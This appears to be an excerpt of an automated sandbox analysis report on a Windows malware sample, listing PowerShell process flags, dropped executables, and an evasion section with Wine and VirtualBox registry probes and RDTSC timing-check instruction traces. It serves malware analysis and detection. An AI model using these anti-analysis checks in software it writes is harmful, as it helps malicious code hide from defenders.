                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe  Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exe  Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                        Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: HKEY_CURRENT_USER\Software\Wine (3 identical entries)
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (3 identical entries)
                        Both keys are environment fingerprints rather than anything the sample needs: HKCU\Software\Wine exists only under Wine, and the ACPI DSDT table named VBOX__ is created by VirtualBox's virtual firmware. The sample and the dropped axplong.exe probe both before continuing.
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CECB6 second address: 9CECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CECBB second address: 9CECC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CECC5 second address: 9CECC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CECC9 second address: 9CECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF624B4E7E2h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CECE8 second address: 9CECEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CECEC second address: 9CECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CECF2 second address: 9CECFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF624C752F6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B46A9A second address: B46A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B46A9F second address: B46AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B46AA5 second address: B46AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B46AA9 second address: B46AB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B46C2B second address: B46C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B46D5D second address: B46D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF624C752F6h 0x0000000a jmp 00007FF624C752FBh 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B48D6C second address: B48D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B48D70 second address: B48D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B48D76 second address: B48D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DEh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B48E04 second address: B48E44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c xor ch, 00000042h 0x0000000f call 00007FF624C752F9h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF624C75302h 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B48F51 second address: B48F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF624B4E7D6h 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B48F5E second address: B48F6C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B48F6C second address: B48F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B48F70 second address: B48F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B49044 second address: B49062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007FF624B4E7D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FF624B4E7D8h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B49062 second address: B490E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jno 00007FF624C752FEh 0x00000013 pop eax 0x00000014 jmp 00007FF624C75302h 0x00000019 push 00000003h 0x0000001b mov edx, eax 0x0000001d push 00000000h 0x0000001f mov edx, 6DB888C0h 0x00000024 push 00000003h 0x00000026 jmp 00007FF624C75302h 0x0000002b call 00007FF624C752F9h 0x00000030 pushad 0x00000031 jbe 00007FF624C752F8h 0x00000037 js 00007FF624C752FCh 0x0000003d je 00007FF624C752F6h 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 je 00007FF624C752F6h 0x0000004e push eax 0x0000004f pop eax 0x00000050 popad 0x00000051 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B490E4 second address: B490FD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B490FD second address: B49101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B49101 second address: B49141 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jp 00007FF624B4E7D6h 0x00000011 jmp 00007FF624B4E7DFh 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF624B4E7E0h 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop esi 0x0000002b rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B49141 second address: B49147 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B67B85 second address: B67B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FF624B4E7E0h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B67D5D second address: B67D63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B67D63 second address: B67D83 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF624B4E7D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF624B4E7D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FF624B4E7D6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B67D83 second address: B67D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B67D89 second address: B67D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B67D8F second address: B67D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624C752F6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B67F12 second address: B67F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B67F1E second address: B67F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B68252 second address: B68258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B68258 second address: B6825C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B683AC second address: B683B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B68928 second address: B6892F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B68E8D second address: B68E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6914C second address: B6915A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jc 00007FF624C752F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6915A second address: B69167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FF624B4E7DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
